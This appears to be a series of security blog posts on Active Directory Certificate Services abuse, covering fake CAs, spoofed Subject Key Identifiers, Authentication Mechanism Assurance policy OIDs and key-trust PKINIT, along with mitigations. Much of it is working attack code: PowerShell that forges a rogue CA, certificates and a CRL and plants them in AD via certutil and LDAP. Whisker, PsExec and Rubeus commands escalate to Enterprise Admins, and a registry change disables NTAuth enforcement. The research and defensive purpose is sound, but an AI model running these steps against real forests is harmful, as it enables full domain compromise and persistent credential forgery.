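# Minimal sketch (parsing logic is my own): split an altSecurityIdentities
# value of the form X509:<SKI>C97F... into its mapping type and value.
def parse_alt_sec_id(value: str):
    prefix, _, rest = value.partition(":")   # "X509", rest = "<SKI>C97F..."
    if prefix != "X509":
        raise ValueError("not an X509 mapping")
    mapping_type = rest[rest.index("<") + 1:rest.index(">")]
    mapping_value = rest[rest.index(">") + 1:]
    return mapping_type, mapping_value

t, v = parse_alt_sec_id("X509:<SKI>C97FACAFD474A962253C5EF55E72ED712B788905")
# Since the SKI is just an attacker-chosen extension, any CA trusted for
# PKINIT could issue a certificate carrying these exact bytes.
```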

Given we have the private key for our fake CA available, let’s create and sign a certificate with the same SKI (Subject Key Identifier).

Issue certificate with same SKI as existing T0 admin
using namespace System.Security.Cryptography
using namespace System.Security.Cryptography.X509Certificates
Import-Module -Name CertRequestTools
$SKIExt = [X509SubjectKeyIdentifierExtension]::new("c97facafd474a962253c5ef55e72ed712b788905", $false)
$CRLDistInfo = [CERTENClib.CCertEncodeCRLDistInfoClass]::new()
$CRLDistInfo.Reset(1)
$CRLDistInfo.SetNameCount(0, 1)
$CRLDistInfo.SetNameEntry(0, 0, 7, "ldap:///CN=Chrisse Root CA,CN=NTTEST-CA-01,CN=CDP,CN=Public Key Services,CN=Services,CN=Configuration,DC=nttest,DC=chrisse,DC=com?certificateRevocationList?base?objectClass=cRLDistributionPoint")
$CRLDistInfoB64 = $CRLDistInfo.EncodeBlob([CERTENClib.EncodingType]::XCN_CRYPT_STRING_BASE64)
$CRLDistInfoExtManaged = [System.Security.Cryptography.X509Certificates.X509Extension]::new("2.5.29.31", [Convert]::FromBase64String($CRLDistInfoB64), $false)

$params = @{
    Type = 'Custom'
    Subject = 'CN=DEMO7 - casoski'
    #KeySpec = 'Signature'
    KeyExportPolicy = 'Exportable'
    KeyLength = 2048
    HashAlgorithm = 'sha256'
    NotAfter = (Get-Date).AddMonths(10)
    CertStoreLocation = 'Cert:\CurrentUser\My'
    # $signer is the 'Fake CA' certificate with private key
    Signer = $signer
    TextExtension = @(
     '2.5.29.37={text}1.3.6.1.5.5.7.3.2',
     '2.5.29.17={text}upn=caso@nttest.chrisse.com')
    Extension =  $CRLDistInfoExtManaged, $SKIExt
}
New-SelfSignedCertificate @params

We can now use this certificate to perform PKINIT and become “Carl Sörqvist (A0)”

cmd
rubeus asktgt /user:CASO /certificate:<HASH> /enctype:aes256 /createnetonly:C:\Windows\System32\cmd.exe /show

For now, until the October patch wave arrives, you can opt out from NTAuth enforcement by setting “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Kdc\AllowNtAuthPolicyBypass=1” – but then you would be vulnerable to the above.
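The registry value quoted above can be set with reg.exe, for example (config fragment only – note that this re-opens the CVE-2025-26647 path described above):

```shell
:: Opt out of NTAuth enforcement (opt-out removed with the October patch wave).
:: Value name and data are the ones quoted in the text above.
reg add "HKLM\SYSTEM\CurrentControlSet\Services\Kdc" /v AllowNtAuthPolicyBypass /t REG_DWORD /d 1 /f
```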

Summary

The same mitigation as presented before applies – make sure you have two enterprise issuing CAs where one of them isn’t trusted in NTAuth. That CA can publish Supply in the request (SITR) templates, while the other CA, which is in NTAuth, should never have any SITR templates published. All Enterprise CAs must be managed from T0 – this is very important – however they can issue certificates to lower tiers.

  • Strong Certificate Binding Enforcement protects against CVE-2022-34691, CVE-2022-26931 and CVE-2022-26923
    • It will NOT protect against bad security hygiene on our CAs, Templates or information within your certificates.
  • NTAuth requirement will protect against CVE-2025-26647 and eliminate all other paths to PKINIT that didn’t require NTAuth
    • Fake CA Scenario
    • AMA Abuse using altSecID from non-NTAuth CA

Note: all my demos use ‘CertRequestTools‘ from Carl Sörqvist and in this case also Rubeus from Will Schroeder.

When your Enterprise PKI becomes one of your enemies (Part 6)

Create, distribute and enforce trust of a fake CA from T1 – PKINIT – altSecurityIdentities + AMA + Cert Publishers

Let’s assume that ‘Issuing CA 2’ here is managed from T1 and not trusted in ‘NTAuth’ – that should not be a problem, right?

In this scenario a Tier 1 administrator could log on to ‘Issuing CA 2’, become SYSTEM and act in the machine’s security context.
Enterprise CAs are automatically added to the ‘Cert Publishers’ group, and that group is always given ‘Full Control’ over an Enterprise CA’s ‘certificationAuthority’ object within ‘CN=Certification Authorities,CN=Public Key Services,CN=Services,CN=Configuration,DC=nttest,DC=chrisse,DC=com’

This is unfortunately hardcoded into the installation of an Enterprise CA. But now to the interesting part – what can you do if you’re a member of ‘Cert Publishers’?

Well, let’s create our own fake CA and a leaf certificate containing the AMA Issuance Policy OID:

CreateFakeCA and Leaf without CRL
Import-Module -Name CertRequestTools
$CertPolicies = New-CertificatePoliciesExtension -Oid "2.5.29.32.0" 
$AmaExtension = New-CertificatePoliciesExtension -Oid "1.3.6.1.4.1.311.21.8.10665564.8181582.1918139.271632.11328427.90.1.402"

$signer = New-SelfSignedCertificate -KeyExportPolicy Exportable `
 -CertStoreLocation Cert:\CurrentUser\My `
 -Subject "CN=Chrisse Root CA,DC=chrisse,DC=com" `
 -NotAfter (Get-Date).AddYears(1) `
 -HashAlgorithm sha256 `
 -KeyusageProperty All `
 -KeyUsage CertSign, CRLSign, DigitalSignature `
 -Extension $CertPolicies `
 -TextExtension @('2.5.29.37={text}1.3.6.1.4.1.311.10.12.1', '2.5.29.19={text}CA=1&pathlength=3')

 $params = @{
    Type = 'Custom'
    Subject = 'CN=DEMO5 - fakecaso1'
    #KeySpec = 'Signature'
    KeyExportPolicy = 'Exportable'
    KeyLength = 2048
    HashAlgorithm = 'sha256'
    NotAfter = (Get-Date).AddMonths(10)
    CertStoreLocation = 'Cert:\CurrentUser\My'
    Signer = $signer
    TextExtension = @(
     '2.5.29.37={text}1.3.6.1.5.5.7.3.2',
     '2.5.29.17={text}upn=caso@nttest.chrisse.com')
    Extension =  $AmaExtension
}
New-SelfSignedCertificate @params
Export-Certificate -Cert $signer -FilePath FakeCA.cer

Find any user within the forest where you can write to the ‘altSecurityIdentities’ attribute

Set-AltSecurityIdentities
$cert  = ls Cert:\CurrentUser\my | where { $_.subject -eq "CN=DEMO5 - fakecaso1" }
.\Set-AltSecurityIdentities.ps1 -Identity CASO -MappingType IssuerSerialNumber -Certificate $cert

So we now have a CA ‘CN=Chrisse Root CA,DC=chrisse,DC=com’ and a certificate issued by that CA, “CN=DEMO5 - fakecaso1”, with the AMA Issuance OID. There is a reason why the CA is named “CN=Chrisse Root CA,DC=chrisse,DC=com” (the name of an already existing root CA within the forest) – and that is because of how certutil -dspublish will handle the CA certificate.
So now let’s become SYSTEM on ‘Issuing CA 2’, which by default is a member of the ‘Cert Publishers’ group, and add the CA certificate to Active Directory using certutil.

cmd
certutil -dspublish -f .\FakeCA.cer rootca


Oops – that worked – so what happened? Basically, as certutil was running as SYSTEM on ‘Issuing CA 2’, a member of ‘Cert Publishers’, it had the ability to write the certificate of our ‘Fake CA’ into the existing object ‘CN=Chrisse Root CA,CN=Certification Authorities,CN=Public Key Services,CN=Services,CN=Configuration,DC=nttest,DC=chrisse,DC=com’ – more precisely into its ‘cACertificate’ attribute – because the subject matched ‘CN=Chrisse Root CA,DC=chrisse,DC=com’.
Our ‘Fake CA’ certificate is now the second value added to the ‘cACertificate’ attribute.

Now the interesting part – will all domain joined clients within this forest now trust our ‘Fake CA’?

Oops again – yep, even on Domain Controllers (DCs) / Key Distribution Centers (KDCs). So what can we do now – the leaf certificate we issued above with the AMA Issuance Policy OID, can we use it to perform PKINIT and take over the forest?

Nope – not possible (at least not yet 🙂 ) – even though the certificate doesn’t have a CDP extension at all, the KDC demands that all certificates used for PKINIT have a valid CDP or OCSP. What if we fix that as well?

Create and Sign CRL with Fake CA
Import-Module -Name CertRequestTools
$Crl = [CERTENROLLlib.CX509CertificateRevocationListClass]::new()
$Crl.Initialize()
$dn = [CERTENROLLlib.CX500DistinguishedNameClass]::new()
$dn.Encode("CN=Chrisse Root CA,DC=chrisse,DC=com", [CERTENROLLlib.x500NameFlags]::XCN_CERT_X500_NAME_STR)
$Crl.Issuer = $dn
$Crl.CRLNumber([CERTENROLLlib.EncodingType]::XCN_CRYPT_STRING_HEX) = "0001"
$signer = [CERTENROLLlib.CSignerCertificateClass]::new()
# Note the thumbprint below is the 'Fake CA' certificate with the private key available 
$signer.Initialize($false,[CERTENROLLlib.X509PrivateKeyVerify]::VerifyNone, [CERTENROLLlib.EncodingType]::XCN_CRYPT_STRING_HEXRAW, "D948F2E5585FD3C7802263DAED9722E67315FA02")
$Crl.SignerCertificate = $signer
$Crl.Encode()

[System.IO.File]::WriteAllBytes("fakeca.crl", [System.Convert]::FromBase64String($Crl.RawData()))

So the next step would be to publish the signed CRL for our fake CA somewhere – we could just host a webserver somewhere and include the URL in a newly issued leaf certificate – it would look something like this:

Issue certificate with AMA extension and HTTP CDP
$AmaExtension = New-CertificatePoliciesExtension -Oid "1.3.6.1.4.1.311.21.8.10665564.8181582.1918139.271632.11328427.90.1.402"

$CRLDistInfo = [CERTENClib.CCertEncodeCRLDistInfoClass]::new()
$CRLDistInfo.Reset(1)
$CRLDistInfo.SetNameCount(0, 1)
$CRLDistInfo.SetNameEntry(0, 0, 7, "http://192.168.1.1/cdp/fakeca.crl")
$CRLDistInfoB64 = $CRLDistInfo.EncodeBlob([CERTENClib.EncodingType]::XCN_CRYPT_STRING_BASE64)
$CRLDistInfoExtManaged = [System.Security.Cryptography.X509Certificates.X509Extension]::new("2.5.29.31", [Convert]::FromBase64String($CRLDistInfoB64), $false)

 $params = @{
    Type = 'Custom'
    Subject = 'CN=DEMO5 - fakecaso2'
    #KeySpec = 'Signature'
    KeyExportPolicy = 'Exportable'
    KeyLength = 2048
    HashAlgorithm = 'sha256'
    NotAfter = (Get-Date).AddMonths(10)
    CertStoreLocation = 'Cert:\CurrentUser\My'
    # $signer is the 'Fake CA' certificate with private key
    Signer = $signer
    TextExtension = @(
     '2.5.29.37={text}1.3.6.1.5.5.7.3.2',
     '2.5.29.17={text}upn=caso@nttest.chrisse.com')
    Extension =  $CRLDistInfoExtManaged, $AmaExtension
}
New-SelfSignedCertificate @params

Find any user within the forest where you can write to the ‘altSecurityIdentities’ attribute

Set-AltSecurityIdentities
$cert  = ls Cert:\CurrentUser\my | where { $_.subject -eq "CN=DEMO5 - fakecaso2" }
.\Set-AltSecurityIdentities.ps1 -Identity CASO -MappingType IssuerSerialNumber -Certificate $cert

But what if the Domain Controllers (DCs) / Key Distribution Centers (KDCs) would block outgoing HTTP traffic to random destinations – well, they should.

But what they can’t block is LDAP access to themselves, right? 🙂 So let’s go for an LDAP CDP instead – hm, but wait, we only have the power of being ‘Cert Publishers’ through the SYSTEM context of ‘Issuing CA 2’ – turns out that might be a problem.

It turns out that ‘Cert Publishers’ has Full Control on any sub-container created as part of every Enterprise CA installation – let’s use that 🙂

Upload CRL signed by FakeCA to AD
using namespace System.DirectoryServices.Protocols

$Assembly = "System.DirectoryServices.Protocols"
Try
{
Add-Type -AssemblyName $Assembly -ErrorAction Stop
}
Catch
{

throw
}
# Connect to the forest root domain – set $ForestDomainName to your forest DNS name, e.g. "nttest.chrisse.com"
$Identifier = [LdapDirectoryIdentifier]::new($ForestDomainName, 389, $false, $false)
$Ldap = [LdapConnection]::new($Identifier, $null, [AuthType]::Kerberos)
$Ldap.AutoBind = $false
$Ldap.ClientCertificates.Clear()
$SessionOptions = $Ldap.SessionOptions
$SessionOptions.LocatorFlag = [LocatorFlags]::WriteableRequired -bor [LocatorFlags]::DirectoryServicesRequired -bor [LocatorFlags]::ForceRediscovery
$SessionOptions.Signing = $true
$SessionOptions.Sealing = $true
$SessionOptions.ProtocolVersion = 3
$SessionOptions.ReferralChasing = [ReferralChasingOptions]::None

Try
{
$Ldap.Bind()
}
Catch
{

throw
}

# Get configurationNamingContext
$ConfigNamingContext = "configurationNamingContext"

$RootDseSearchRequest = [SearchRequest]::new([String]::Empty, "(&(objectClass=*))", [SearchScope]::Base, $ConfigNamingContext)
Try
{
$RootDseSearchResponse = [SearchResponse]$Ldap.SendRequest($RootDseSearchRequest)
}
Catch
{

throw
}
If ($RootDseSearchResponse.Entries.Count -eq 0)
{

throw
}
$RootDse = $RootDseSearchResponse.Entries[0]

If (!$RootDse.Attributes.Contains($ConfigNamingContext))
{

throw
}
$CDPLocation = ""
$CASubject = "CN=Chrisse Root CA"
$Configuration = $RootDse.Attributes[$ConfigNamingContext][0]

$searchRequest = [SearchRequest]::new([String]::Format("CN=CDP,CN=Public Key Services,CN=Services,{0}", $Configuration), "(objectClass=cRLDistributionPoint)", [SearchScope]::Subtree, "objectClass")

$searchResponse = $ldap.SendRequest($searchRequest);

if ($searchResponse.Entries.Count -eq 0)
{
throw
}
foreach($entry in $searchResponse.Entries)
{
if($entry.DistinguishedName.StartsWith($CASubject, [System.StringComparison]::CurrentCultureIgnoreCase))
{
$CDPContainer = $entry.DistinguishedName.IndexOf(',') +1
$CDPLocation = $entry.DistinguishedName.Substring($CDPContainer)
}
}

if ($CDPLocation -eq "")
{
$CDPContainer = $searchResponse.Entries[0].DistinguishedName.IndexOf(',') +1
$CDPLocation = $searchResponse.Entries[0].DistinguishedName.Substring($CDPContainer)
}

#Load the CRL created and signed earlier from file
$CrlBytes = [System.IO.File]::ReadAllBytes("fakeca.crl")

$addRequest = [AddRequest]::new([String]::Format("$CASubject,{0}", $CDPLocation),
[DirectoryAttribute]::new("objectClass", "cRLDistributionPoint"),
[DirectoryAttribute]::new("certificateRevocationList", $CrlBytes)
)
$addResponse = $ldap.SendRequest($addRequest)

So now let’s issue a new certificate from our ‘FakeCA’ that includes both the AMA Issuance Policy OID and the CDP extension pointing to an LDAP URI instead of HTTP.

Issue certificate with AMA extension and LDAP CDP
Import-Module -Name CertRequestTools
$AmaExtension = New-CertificatePoliciesExtension -Oid "1.3.6.1.4.1.311.21.8.10665564.8181582.1918139.271632.11328427.90.1.402"
$CRLDistInfo = [CERTENClib.CCertEncodeCRLDistInfoClass]::new()
$CRLDistInfo.Reset(1)
$CRLDistInfo.SetNameCount(0, 1)
$CRLDistInfo.SetNameEntry(0, 0, 7, "ldap:///CN=Chrisse Root CA,CN=NTTEST-CA-01,CN=CDP,CN=Public Key Services,CN=Services,CN=Configuration,DC=nttest,DC=chrisse,DC=com?certificateRevocationList?base?objectClass=cRLDistributionPoint")
$CRLDistInfoB64 = $CRLDistInfo.EncodeBlob([CERTENClib.EncodingType]::XCN_CRYPT_STRING_BASE64)
$CRLDistInfoExtManaged = [System.Security.Cryptography.X509Certificates.X509Extension]::new("2.5.29.31", [Convert]::FromBase64String($CRLDistInfoB64), $false)

 $params = @{
    Type = 'Custom'
    Subject = 'CN=DEMO5 - fakecaso3'
    #KeySpec = 'Signature'
    KeyExportPolicy = 'Exportable'
    KeyLength = 2048
    HashAlgorithm = 'sha256'
    NotAfter = (Get-Date).AddMonths(10)
    CertStoreLocation = 'Cert:\CurrentUser\My'
    # $signer is the 'Fake CA' certificate with private key
    Signer = $signer
    TextExtension = @(
     '2.5.29.37={text}1.3.6.1.5.5.7.3.2',
     '2.5.29.17={text}upn=caso@nttest.chrisse.com')
    Extension =  $CRLDistInfoExtManaged, $AmaExtension
}
New-SelfSignedCertificate @params

Find any user within the forest where you can write to the ‘altSecurityIdentities’ attribute

Set-AltSecurityIdentities
$cert  = ls Cert:\CurrentUser\my | where { $_.subject -eq "CN=DEMO5 - fakecaso3" }
.\Set-AltSecurityIdentities.ps1 -Identity CASO -MappingType IssuerSerialNumber -Certificate $cert

Now perform PKINIT using the certificate with the AMA Issuance OID and LDAP CDP, issued and signed by our ‘Fake CA’ – nothing can stop us now.

Use Rubeus to perform the PKINIT, and thanks to having the AMA Issuance OID we should be ‘Enterprise Admins’ within the forest.

cmd
rubeus asktgt /user:CASO /certificate:<HASH> /enctype:aes256 /createnetonly:C:\Windows\System32\cmd.exe /show

All it required was altSecurityIdentities + AMA + Cert Publishers – a T1 admin that had access to an Enterprise CA in T1 and the ability to write ‘altSecurityIdentities’ on at least one user within the entire forest – and, of course, that AMA is being used to safeguard Enterprise Admins.

So to summarize: all Enterprise CAs within an Active Directory forest _must_ be managed from T0, otherwise escalation paths like the one just described can be accomplished. And just think about what we have done here – even if you’re not using AMA, there is still a Certificate Authority that is trusted on/by all domain joined devices within the forest; you can create web server certificates, code signing certificates etc.

Note: all my demos use ‘CertRequestTools‘ from Carl Sörqvist and in this case also Rubeus from Will Schroeder.

Credits to “Decoder’s” blog that brought this topic to light – I have just proven it can be combined with AMA abuse to gain full control of the forest, as well as writing some sample code showing how to create a ‘Fake CA’ in PowerShell.

When your Enterprise PKI becomes one of your enemies (Part 5)

Mitigate Authentication Mechanism Assurance (AMA) abuse
In the last blog post in this series – When your Enterprise PKI becomes one of your enemies (Part 4) – we went through how Authentication Mechanism Assurance (AMA) works and how it can be abused together with Public Key Infrastructure (PKI) to compromise an Active Directory forest if it’s not designed the right way.

One of the core issues here, as has been demonstrated in the previous blog article(s), is that AMA abuse can be performed by obtaining a certificate from a certificate authority that is trusted by the KDC (but not necessarily trusted in NTAuth) – to summarize the requirements again:

  1. Obtain a certificate from a certificate authority (CA) that is trusted on the KDC and being able to supply the AMA Issuance Policy OID – this can be achieved by:
    • Certificate Template configured for ‘Supply in the request’ – SITR
    • Being able to write to at least one user account’s altSecID (altSecurityIdentities) attribute.
  2. Using key trust and obtain a certificate from a certificate authority (CA) that is trusted in NTAuth and being able to supply the AMA Issuance Policy OID – this can be achieved by:
    • Certificate Template configured for ‘Supply in the request’ – SITR
    • Being local administrator or being able to become SYSTEM on any domain member within the forest, e.g. a regular client is enough.

Note: the privilege escalation using AMA abuse depends on the privilege that is linked to the ‘AMA Issuance Policy OID’.

So how can we mitigate those?

Mitigation 1: Un-trust ”Issuing CA 2″ on all Domain Controllers / Key Distribution Centers
Let’s think a bit about the first scenario (1.) – here it’s not even required that the certificate authority is trusted in NTAuth; it’s enough that the CA is trusted on the KDCs. So even with our two Enterprise CA design, where one of them (CA2) is NOT trusted in NTAuth, we’re not going to be protected, as ‘Issuing CA 2’ is still an Enterprise CA and is going to be rolled out to all domain members’ ‘Intermediate Certification Authorities’ store, including on domain controllers / KDCs.

One way to block this could be to specifically “un-trust” the certificate authority (CA) on the domain controllers / KDCs. This can be accomplished by adding the ‘Issuing CA 2’ CA certificate to the “Untrusted Certificates” store on all domain controllers / KDCs.

Note: this can of course be done using a Group Policy, but it needs to be updated every time the CA certificate on ‘Issuing CA 2’ is renewed.

The real downside with this is the manual maintenance of blocking ‘Issuing CA 2’, as new CA certificates will be issued over time.

Let’s try another approach

Mitigation 2 – Require an Issuance Policy

One way to mitigate the AMA abuse would be to ensure that no one can supply an issuance policy at all in certificates issued by ‘Issuing CA 2’ – or by any other certificate authority within the forest that is trusted on domain controllers / KDCs. That might be certificate authorities that host Supply in the request (SITR) templates, but it is not limited to those; it can also be standalone or 3rd party CAs.

By including your own Issuance Policy OID (let’s call it ‘TLS Low Assurance Policy’) in ‘Issuing CA 2’s CA certificate and omitting “2.5.29.32.0” (All Issuance Policies), it becomes an enforcement that all leaf certificates issued by the CA must also include your own Issuance Policy. Since every leaf certificate must contain your own Issuance Policy OID, it is by design impossible to include the policy OID used by AMA, hence blocking any AMA abuse.

So how is this implemented in reality? Well, it depends on the type of certificate authority, but for Active Directory Certificate Services (AD CS) this would go into your capolicy.inf.

CAPolicy.inf with Chrisse TLS Low Assurance Policy
[Version]
Signature= "$Windows NT$"

[BasicConstraintsExtension]
Pathlength = 0
Critical = true

[PolicyStatementExtension]
Policies = EnterpriseCA02Oid,LowIssuancePolicy
Critical = 0

[EnterpriseCA02Oid]
Notice = "Chrisse Issuing CA 2"
OID = 1.3.6.1.4.1.51467.2.1.2.1.3

[LowIssuancePolicy]
Notice = "Chrisse TLS Low Assurance Policy"
OID = 1.3.6.1.4.1.51467.2.1.2.3.1

[Certsrv_Server]
RenewalKeyLength = 4096
RenewalValidityPeriodUnits = 6
RenewalValidityPeriod = years
CRLPeriod = days
CRLPeriodUnits = 3
CRLDeltaPeriod = days
CRLDeltaPeriodUnits = 0
ClockSkewMinutes = 20 
LoadDefaultTemplates = 0
AlternateSignatureAlgorithm = 0

Now to the downside of this mitigation approach – how do you ensure that the ‘TLS Low Assurance Policy’ is included in every leaf certificate? Because if you don’t, issuance will fail. If you have an Active Directory Certificate Services (AD CS) Enterprise CA – as ‘Issuing CA 2’ in this case is, it’s just not a member of NTAuth – you can simply include this certificate policy in all templates that are published on ‘Issuing CA 2’. This also safeguards against someone mistakenly publishing a certificate template that doesn’t belong there, because if that template is missing the ‘TLS Low Assurance Policy’ it would again fail enrollment of any certificate using that template.

But what about 3rd party CAs, or Active Directory Certificate Services (AD CS) installed as a standalone certificate authority? Well, then the policy must be included in the request (CSR).
This can be done fairly simply with openssl:

cmd
openssl req -new -subj "/CN=RHEL9" -addext "subjectAltName = DNS:RHEL9, DNS:RHEL9.eur.corp.chrisse.com" -addext "certificatePolicies = 1.3.6.1.4.1.51467.2.1.2.3.1" -newkey rsa:2048 -keyout key.pem -out req.pem -nodes

It’s a bit more complicated using native PowerShell, but relatively easy using Carl Sörqvist’s module.

PowerShell
Import-Module -Name CertRequestTools
$CA2 = "nttest-ca-02.nttest.chrisse.com\Chrisse Issuing CA 2"  
$IssuancePolicyExtension = New-CertificatePoliciesExtension -Oid "1.3.6.1.4.1.51467.2.1.2.3.1"
 
New-PrivateKey -RsaKeySize 2048 -KeyName ([Guid]::NewGuid()) `
| New-CertificateRequest `
    -Subject "CN=DEMO3" `
    -UserPrincipalName "caso@nttest.chrisse.com" `
    -OtherExtension $IssuancePolicyExtension `
| Submit-CertificateRequest `
    -ConfigString $CA2 `
| Install-Certificate -Name My -Location CurrentUser

So an Enterprise CA can never be managed outside of T0
Why? Let’s have a look at this scenario – assume that ‘Issuing CA 2’ was not managed from Tier 0 for a while:

In that scenario a Tier 1 administrator could log on to ‘Issuing CA 2’, become SYSTEM and act in the machine’s security context. Enterprise CAs are automatically added to the ‘Cert Publishers’ group, and that group is always given ‘Full Control’ over an Enterprise CA’s ‘certificationAuthority’ object within ‘CN=Certification Authorities,CN=Public Key Services,CN=Services,CN=Configuration,DC=nttest,DC=chrisse,DC=com’

This is unfortunately hardcoded into the installation of an Enterprise CA. But now to the interesting part – what can you do if you’re a member of ‘Cert Publishers’? Stay tuned for the next part in this blog series, “When your Enterprise PKI becomes one of your enemies (Part 6)”.

When your Enterprise PKI becomes one of your enemies (Part 4)

In the last blog post in this series – When your Enterprise PKI becomes one of your enemies (Part 3) – we went through how Authentication Mechanism Assurance (AMA) works and how it can be abused together with Public Key Infrastructure (PKI) to compromise an Active Directory forest if it’s not designed the right way.

To summarize the abuse demonstrated in that post, here are the requirements (note that the CA doesn’t have to be trusted in NTAuth):

  1. Obtain a certificate from a certificate authority (CA) that is trusted on the KDC and being able to supply the AMA Issuance Policy OID – this can be achieved by:
    • Certificate Template configured for ‘Supply in the request’ – SITR
    • Being delegated Certificate Manager on the certificate authority for one or more templates
  2. The KDC must have a valid certificate
  3. Being able to write to at least one user account’s altSecID (altSecurityIdentities) attribute.

Authentication Mechanism Assurance (AMA) abuse using Key Trust and KCL

Let’s demonstrate another way to abuse Authentication Mechanism Assurance (AMA) and change the requirements a bit – this is only possible against Windows Server 2016 KDCs and later.

Windows Server 2016 introduced the Key Trust model to the KDC, where PKINIT can be performed using an explicit key trust instead of a certificate trust. The key trust model works by mapping the public key of a private/public key pair into the ‘msDS-KeyCredentialLink’ attribute of a security principal derived from the user or computer class; authentication can then be performed by proving possession of the corresponding private key. This functionality was mainly added to support Windows Hello for Business (WHFB) and to allow other authentication methods to be used on top of PKINIT; it’s also utilized by Entra ID – Kerberos Cloud Trust.
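As a rough illustration of the mapping itself: each entry in ‘msDS-KeyCredentialLink’ identifies its key by a KeyID that is the SHA-256 hash of the raw key material ([MS-ADTS] KEYCREDENTIALLINK_ENTRY). A minimal Python sketch of just that hash relationship – the key bytes below are stand-ins, not a real RSA public key blob:

```python
import hashlib

# Sketch: the KeyID stored in a msDS-KeyCredentialLink entry is the SHA-256
# hash of the KeyMaterial bytes. Stand-in bytes here; a real entry carries
# the account's RSA public key blob.
key_material = b"example-public-key-bytes"
key_id = hashlib.sha256(key_material).digest()
print(key_id.hex())
```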

For more information see – 3.1.5.2.1.4 Key Trust

So what does the Key Trust model have to do with Authentication Mechanism Assurance (AMA)?

We can think of ‘msDS-KeyCredentialLink’ as the ‘altSecurityIdentities’ attribute in the previous abuse scenario – but there is one major difference: a computer account can by default write to its own ‘msDS-KeyCredentialLink’ attribute, a right granted to the SELF security principal in every computer account’s default ACL – as long as ‘msDS-KeyCredentialLink’ is empty.

This is interesting, as it means there is no need for any special access in the directory to upload the public key of our private/public key pair, as long as we can become / operate in the security context of just one domain joined computer account within the entire forest – doing so only requires being local administrator on one of those boxes and utilizing PsExec to become SYSTEM.

Note: all my demos use ‘CertRequestTools‘ from Carl Sörqvist and in this case also Rubeus from Will Schroeder and Whisker from Elad Shamir.

But first we need to obtain a certificate with the AMA Issuance Policy OID in order to abuse it – and enroll it to the machine. Replace <Template> with a template in your environment configured for Supply in the request (SITR):

AMA-KCL.ps1
Import-Module -Name CertRequestTools
# Chrisse Issuing CA1 is trusted in NTAUTH
$CA1 = "nttest-ca-01.nttest.chrisse.com\Chrisse Issuing CA 1"  
# A0 AMA Policy OID (linked to Enterprise Admins)
$AmaExtension = New-CertificatePoliciesExtension -Oid "1.3.6.1.4.1.311.21.8.10665564.8181582.1918139.271632.11328427.90.1.402"
 
New-PrivateKey -RsaKeySize 2048 -KeyName ([Guid]::NewGuid()) `
| New-CertificateRequest `
    -Subject "CN=DEMO4" `
    -UserPrincipalName "NTTEST-CL-01.nttest.chrisse.com" `
    -OtherExtension $AmaExtension `
| Submit-CertificateRequest `
    -ConfigString $CA1 `
    -Template <Template> `
| Install-Certificate -Name My -Location LocalMachine

Now it’s time to become the machine itself and act as SYSTEM on “NTTEST-CL-01.nttest.chrisse.com”:

cmd
Psexec.exe -i -s C:\WINDOWS\system32\cmd.exe

Now we’re going to add the public key of our certificate to the ‘msDS-KeyCredentialLink’ attribute – to do this we use a tool named Whisker.

Replace <HASH> with the hash of the certificate issued previously and launch it in the cmd instance created by PsExec.

cmd
whisker add /target:NTTEST-CL-01$ /path:<HASH>

Note that I’ve modified whisker slightly to look for a certificate by hash in the computer personal store also known as LocalMachine\MY.

Now the path is very similar to the previous abuse scenario – we will use Rubeus to perform a PKINIT with our certificate’s public key; it’s going to be matched with the key we just stored in ‘msDS-KeyCredentialLink’ of the computer account “NTTEST-CL-01.nttest.chrisse.com”.

Note that I’ve modified rubeus slightly to also look for certificates by hash in the computer personal store also known as LocalMachine\MY.

cmd
rubeus asktgt /user:NTTEST-CL-01$ /certificate:<HASH> /enctype:aes256 /createnetonly:C:\Windows\System32\cmd.exe /show

We should now be authenticated as the computer account “NTTEST-CL-01.nttest.chrisse.com”, having the extra two security groups – ‘Enterprise Admins (AMA)’ and ‘Enterprise Admins’ (RID 519) – as part of our token, thanks to the AMA Issuance Policy being present in the certificate we authenticated with.


You should now see something similar to the screen below; the cmd launched by Rubeus should now have ‘Enterprise Admin’ privileges and you should be able to add a user to ‘Domain Admins’ as stated in the example.


Summary

The main difference using this path to abuse Authentication Mechanism Assurance (AMA), compared to the example demonstrated in the previous blog post, comes down to two things:

  1. The ability to become local administrator at any computer within the Active Directory forest instead of having write access in Active Directory to a users ‘altSecurityIdentities’ attribute.
  2. For this to work the certificate authority that the certificate is issued from must be from a certificate authority that is trusted in NTAuth.

The requirement of being able to supply the AMA Issuance OID into the certificate still remains and can be achieved the same way.

  • Templates published on the Certificate Authority that are configured for Supply in the request – SITR.
  • Being Certificate Manager on the CA over one or more templates

One side effect of dealing with a key trust here instead of a certificate trust is that the KDC will ignore any validation errors, such as CRL checks – that means if a certificate gets issued for AMA abuse and its key is stored in any computer account’s ‘msDS-KeyCredentialLink’ in the forest, it would NOT help if you revoked that certificate. Pretty bad, isn’t it? In order to scan your forest you must obtain the public key of every certificate issued with the AMA Issuance Policy OID from all your Certificate Authorities and start scanning every single object with contents in ‘msDS-KeyCredentialLink’ – and it’s a linked multi-valued attribute.


Authentication Mechanism Assurance (AMA) is a good feature if deployed correctly, for the reasons mentioned in the beginning of this post – binding strong privileges to certificate based authentication, just in time, is a good thing for sure. The question remains: what can we do to prevent the abuse of Authentication Mechanism Assurance (AMA) as described and demonstrated in this blog post? It’s possible if you design your Public Key Infrastructure – and how it integrates with Active Directory – the right way, and we’re going to cover some alternatives on how this can be mitigated in coming blog posts.